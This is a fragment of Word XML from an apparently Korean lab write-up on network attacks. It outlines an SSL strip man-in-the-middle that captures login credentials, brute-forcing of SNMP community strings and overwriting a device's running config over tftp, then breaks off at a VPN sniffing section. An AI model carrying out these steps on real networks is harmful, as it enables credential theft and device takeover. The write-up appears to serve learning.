    <w:p w:rsidR="00CF524B" w:rsidRPr="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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 w:val="22"/>
        </w:rPr>
        <w:t>SSL Strip Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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186940" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="108" name="그림 108" descr="https://lh4.googleusercontent.com/7LvD6Qj1cODS_BrQud3a3-FhplHz-f4h5Ao_N86EiFdEHRmEBB3Neb8nlzZLgqRd1x2fA_jN2a6awAxig6FHSv3IEMS8U2g-lRlG8pTe3ubk1AksNxhWbKex3TmrCbfpUx0pyF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h4.googleusercontent.com/7LvD6Qj1cODS_BrQud3a3-FhplHz-f4h5Ao_N86EiFdEHRmEBB3Neb8nlzZLgqRd1x2fA_jN2a6awAxig6FHSv3IEMS8U2g-lRlG8pTe3ubk1AksNxhWbKex3TmrCbfpUx0pyFbX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424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="109" name="그림 109" descr="https://lh6.googleusercontent.com/ORvtO_1J0BDkBBn_Jordq4kJCxKkzxaTaTQptBw_xRQoiBMKCH21rAUAS0EP7DoQNB4Z4gG-dT1ETcDrilv2lwEFS57H6MxxP0KgVjpdE9VFnZmQFR5jjgOuGQs-bne2Lu7o0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h6.googleusercontent.com/ORvtO_1J0BDkBBn_Jordq4kJCxKkzxaTaTQptBw_xRQoiBMKCH21rAUAS0EP7DoQNB4Z4gG-dT1ETcDrilv2lwEFS57H6MxxP0KgVjpdE9VFnZmQFR5jjgOuGQs-bne2Lu7o0C1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공격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앞서</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TL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제대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작동하는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 xml:space="preserve">SSL strip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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위한</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sslstrip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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설치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02180" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="110" name="그림 110" descr="https://lh4.googleusercontent.com/eX5tyRh6GaPYuNxtkTRIVUs36vt_p5Gvm5c9Pnawy1kWbBAqUNq1E9WTpQbrjsSurQnRQ6AnCsDsEy5VOXm0gowBoas7M9enYLhh4r1aP9Ityq3LeTb2OBsf7bqrbPtOg261Se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h4.googleusercontent.com/eX5tyRh6GaPYuNxtkTRIVUs36vt_p5Gvm5c9Pnawy1kWbBAqUNq1E9WTpQbrjsSurQnRQ6AnCsDsEy5VOXm0gowBoas7M9enYLhh4r1aP9Ityq3LeTb2OBsf7bqrbPtOg261Sepj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0760" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111" name="그림 111" descr="https://lh4.googleusercontent.com/0YeSixLJoljmks9Yu3nCPZFUSrnvou_jVRKdV2q9h24s5QBc08R98noTdai24OTZgfdOsIDVLNue4yfP7Qmd_1QHABxYUTL_JfoUss-1ijI3BfVxKiHhJQQVpQe6hT1SkLiVx4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h4.googleusercontent.com/0YeSixLJoljmks9Yu3nCPZFUSrnvou_jVRKdV2q9h24s5QBc08R98noTdai24OTZgfdOsIDVLNue4yfP7Qmd_1QHABxYUTL_JfoUss-1ijI3BfVxKiHhJQQVpQe6hT1SkLiVx4aq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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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에</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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만들고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80</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>번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포트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10000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>번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포트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R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>edirect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키겠다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방화벽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설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524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278380" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="112" name="그림 112" descr="https://lh5.googleusercontent.com/AK2-kItmOzfpGHZnGu7ZIu6JVXrb6sW3EuX8i1y-ELcjvLNPUHNCtV4NbgofhwWE9Wz7OQaE8BgbygZjaUvU8PYDOfoeebILb2v2HXfkf36bxkSyNIaN-TN1ZOKwg7Vxnz93vh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lh5.googleusercontent.com/AK2-kItmOzfpGHZnGu7ZIu6JVXrb6sW3EuX8i1y-ELcjvLNPUHNCtV4NbgofhwWE9Wz7OQaE8BgbygZjaUvU8PYDOfoeebILb2v2HXfkf36bxkSyNIaN-TN1ZOKwg7Vxnz93vhWJ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 xml:space="preserve">Sslstrip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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실행</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션으로</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>포트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들어오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요청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대해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도록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설정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40280" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="113" name="그림 113" descr="https://lh4.googleusercontent.com/O473fURzCpO7ePGWsNGM_oX3fFvxGW-h_VlAQnXV8LAfWhbdPUDrpFJ-KAkFRv3y4KtBAyRngVqjPxaeVlrn1S_kD-ihmfiAXAPY6cK37KNITygB_Y_Ax8G5redjZtp3qFC18q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h4.googleusercontent.com/O473fURzCpO7ePGWsNGM_oX3fFvxGW-h_VlAQnXV8LAfWhbdPUDrpFJ-KAkFRv3y4KtBAyRngVqjPxaeVlrn1S_kD-ihmfiAXAPY6cK37KNITygB_Y_Ax8G5redjZtp3qFC18qi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303020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="그림 114" descr="https://lh5.googleusercontent.com/VDnpQYGAuNdRMTv4hkIMRBiclUu8GdVV1tXJnv5GAGTf51L1GTURJDfk5G6n0MJnVD0jesqdlcNL1DbwsHCzaRdm-ejUOcRJuaDzCUHa_ept7gT7LyoH2zi-3dmRIZESV1EHAy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h5.googleusercontent.com/VDnpQYGAuNdRMTv4hkIMRBiclUu8GdVV1tXJnv5GAGTf51L1GTURJDfk5G6n0MJnVD0jesqdlcNL1DbwsHCzaRdm-ejUOcRJuaDzCUHa_ept7gT7LyoH2zi-3dmRIZESV1EHAyI-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CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524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8380" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="115" name="그림 115" descr="https://lh5.googleusercontent.com/OdaHZv1shQXr0shvPbEXFvFbTzYkj6yOvhuF2pr50AaRCHOMvXHzga122P7W0Ad1S8xL03bej6ae95wZGJXelh-8ysZkf6x0hFZj9VIOP-28xdHtv0POBPMAVwFhSiayTkh3UT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h5.googleusercontent.com/OdaHZv1shQXr0shvPbEXFvFbTzYkj6yOvhuF2pr50AaRCHOMvXHzga122P7W0Ad1S8xL03bej6ae95wZGJXelh-8ysZkf6x0hFZj9VIOP-28xdHtv0POBPMAVwFhSiayTkh3UTW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으로 돌아와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wire Shark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 확인해보면 아이디와 비밀번호가 노출된 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRPr="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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 w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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25040" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="116" name="그림 116" descr="https://lh4.googleusercontent.com/4VZzuAAXvLtriz7smnOQJiq6eh12g-seQqRSKWWx9pi6XFeKrBqDkMLZHGR10JGiWB_SInsebb0dedXGUnOuVezxMvAE5myKf5J60TE7A3gm_PjDd1BHrga7SddR6a9RciwGP4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h4.googleusercontent.com/4VZzuAAXvLtriz7smnOQJiq6eh12g-seQqRSKWWx9pi6XFeKrBqDkMLZHGR10JGiWB_SInsebb0dedXGUnOuVezxMvAE5myKf5J60TE7A3gm_PjDd1BHrga7SddR6a9RciwGP4fv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194560" cy="1287780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="117" name="그림 117" descr="https://lh3.googleusercontent.com/D5CAIHUxeqgOGH3EJihB63lW0X2BhOp7_TfRc7s7BfSOQ9uVhkbWK-8QtzrksUsqmeRU6k6MyFs3Z_3wviMQebSC-pxWhpq-0zEHvK3S6rOJYCVGyEYijEdZtnODwhEopuxnq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h3.googleusercontent.com/D5CAIHUxeqgOGH3EJihB63lW0X2BhOp7_TfRc7s7BfSOQ9uVhkbWK-8QtzrksUsqmeRU6k6MyFs3Z_3wviMQebSC-pxWhpq-0zEHvK3S6rOJYCVGyEYijEdZtnODwhEopuxnqfB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/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격에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앞서</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> snmp</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서비스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지원해주는지</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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사용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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>후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Community String</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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알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오기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위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사용할</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dictionary </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일인</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dict.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파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240280" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="118" name="그림 118" descr="https://lh6.googleusercontent.com/bLQ7CW2Z9OlerxRIcvipzgtVe0ATWyAZNfD3Rlq4bGYpE9OvYtsyyuPm_1YXTJiBsHwr3nKcVUu3xtroff1FMha8UnxXQcsWgn3mlmKPIEbEwG_6KgT26Ruc8i5kOvTa1inSgS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h6.googleusercontent.com/bLQ7CW2Z9OlerxRIcvipzgtVe0ATWyAZNfD3Rlq4bGYpE9OvYtsyyuPm_1YXTJiBsHwr3nKcVUu3xtroff1FMha8UnxXQcsWgn3mlmKPIEbEwG_6KgT26Ruc8i5kOvTa1inSgSVz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Onesixtyone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴과</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dict.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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사용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대상의</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Community String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>알아오기</w:t>
      </w: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40280" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="119" name="그림 119" descr="https://lh6.googleusercontent.com/RlA6oNXQ7_uJOT7LvdyoPzIy9ZGiC0p0KbjuJA26K2uhHJLdCaS5ZByypq6Z4Zlz1A-C2no8nq93bcCAgwJIz46C2m_IwyMhWpNKzfid1fjEVGOcWvcMWkxLT7aBWp3-0dQRu6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h6.googleusercontent.com/RlA6oNXQ7_uJOT7LvdyoPzIy9ZGiC0p0KbjuJA26K2uhHJLdCaS5ZByypq6Z4Zlz1A-C2no8nq93bcCAgwJIz46C2m_IwyMhWpNKzfid1fjEVGOcWvcMWkxLT7aBWp3-0dQRu6W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17420" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="120" name="그림 120" descr="https://lh5.googleusercontent.com/Ut2z5yIDeBiyciMVB0cpZvjBHdH7BY2e9YqRl-KYFCIt0rNu8qSa8DVE9uQ1kHm6WirAL5YbpDgEKNYSA6U6QE1SayMpUSOOxQnarIFHSNh7jpF0f4Y0nARMWhFx_qYa4hqx9dP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h5.googleusercontent.com/Ut2z5yIDeBiyciMVB0cpZvjBHdH7BY2e9YqRl-KYFCIt0rNu8qSa8DVE9uQ1kHm6WirAL5YbpDgEKNYSA6U6QE1SayMpUSOOxQnarIFHSNh7jpF0f4Y0nARMWhFx_qYa4hqx9dP_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하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tftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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실행하고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> up_running_config, copy_running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파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25040" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="121" name="그림 121" descr="https://lh4.googleusercontent.com/zvYIcVf0YfcBiUYXzrJu09_eFBrIS4gDxSqne5iIgx-Z1VK0YXS8B_TLqXxJ9SF49HjY4dufU4KBvtsrRtS6gjBCor1NTqY7QHHt26Ag02mqNeQPPP72Yd4zAoHogLx4Fu2DBA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h4.googleusercontent.com/zvYIcVf0YfcBiUYXzrJu09_eFBrIS4gDxSqne5iIgx-Z1VK0YXS8B_TLqXxJ9SF49HjY4dufU4KBvtsrRtS6gjBCor1NTqY7QHHt26Ag02mqNeQPPP72Yd4zAoHogLx4Fu2DBAyz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40280" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="122" name="그림 122" descr="https://lh6.googleusercontent.com/z4DpcdSJeLI9zXtAbjuASSKuO-uR2w4ixyPibxCiX5DE7Nan0taSwA4jJUuoXS3bX2kmT17E38-mzXwa0irJjeIEdFRSoE5RTCxWeg_K83ByOCWn4ATy1gyOfAwf13iJzeBps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h6.googleusercontent.com/z4DpcdSJeLI9zXtAbjuASSKuO-uR2w4ixyPibxCiX5DE7Nan0taSwA4jJUuoXS3bX2kmT17E38-mzXwa0irJjeIEdFRSoE5RTCxWeg_K83ByOCWn4ATy1gyOfAwf13iJzeBpsESk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py_running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일과</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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대상의</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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아왔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17420" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="123" name="그림 123" descr="https://lh4.googleusercontent.com/gZLYPyihpVAFMW1HxCSycKqQmpJ2TXRARsRZC6Z-gQVcMTpPIWDie9HOc848XgQVVBqgCJ2fdwmQXuFrHDynJTZdV2pMhAkaN6cEd63jtghIsXNpsmuBo7XoGT5lU0t7rdjmbZ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lh4.googleusercontent.com/gZLYPyihpVAFMW1HxCSycKqQmpJ2TXRARsRZC6Z-gQVcMTpPIWDie9HOc848XgQVVBqgCJ2fdwmQXuFrHDynJTZdV2pMhAkaN6cEd63jtghIsXNpsmuBo7XoGT5lU0t7rdjmbZM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55520" cy="1516380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="124" name="그림 124" descr="https://lh5.googleusercontent.com/Gbm2_1wYDz8fjudLguWEoOjWrBmmX7c4NTkv4w-5FWf23sMgiIklHXKsaCMz0s3wjPH13aKg83s0T1t1kDMf-ly5nC8jBpz4mvBW-Kz6aT3BgGLufpcsPmO6uwF8uU4kxYtE_5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lh5.googleusercontent.com/Gbm2_1wYDz8fjudLguWEoOjWrBmmX7c4NTkv4w-5FWf23sMgiIklHXKsaCMz0s3wjPH13aKg83s0T1t1kDMf-ly5nC8jBpz4mvBW-Kz6aT3BgGLufpcsPmO6uwF8uU4kxYtE_5Pq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/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>받아온</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running_config </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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바꾸고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싶은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내용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파일로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만들</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>고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 xml:space="preserve">Up_running_config </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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이용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만든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공격파일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공격대상에게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보내기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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2225040" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="125" name="그림 125" descr="https://lh4.googleusercontent.com/Hx_vA5V1fR5ttcdg1D3wul9SCZXWlIHoVXAsmHwJ27VpwZ_9RIKGMK_vPToVj_1C9HckLkMFDUP1zm7v9kNchrzS57c5zc1yPnYMIqzQ5QfdfJFhds2uOW9AsnF4VQk6xJs6tB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lh4.googleusercontent.com/Hx_vA5V1fR5ttcdg1D3wul9SCZXWlIHoVXAsmHwJ27VpwZ_9RIKGMK_vPToVj_1C9HckLkMFDUP1zm7v9kNchrzS57c5zc1yPnYMIqzQ5QfdfJFhds2uOW9AsnF4VQk6xJs6tBpH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86000" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="126" name="그림 126" descr="https://lh3.googleusercontent.com/tOs8yJxZE7v2VQfY9LE5TSw2BBYICmxkeU37QkevFtsL3HHI8WxtxzL2kMBgcYf8UzVKcFnZ-OPPnZMreyA9qz2l_BC7E_yONg-AEF0LJ3sO8tDjn79p8ZVbQ6f7xG8-yyEKsz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lh3.googleusercontent.com/tOs8yJxZE7v2VQfY9LE5TSw2BBYICmxkeU37QkevFtsL3HHI8WxtxzL2kMBgcYf8UzVKcFnZ-OPPnZMreyA9qz2l_BC7E_yONg-AEF0LJ3sO8tDjn79p8ZVbQ6f7xG8-yyEKszw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됐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하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다시</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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아온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바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적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됐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pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRPr="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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 w:val="22"/>
        </w:rPr>
        <w:t>VPN Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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09800" cy="1775460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
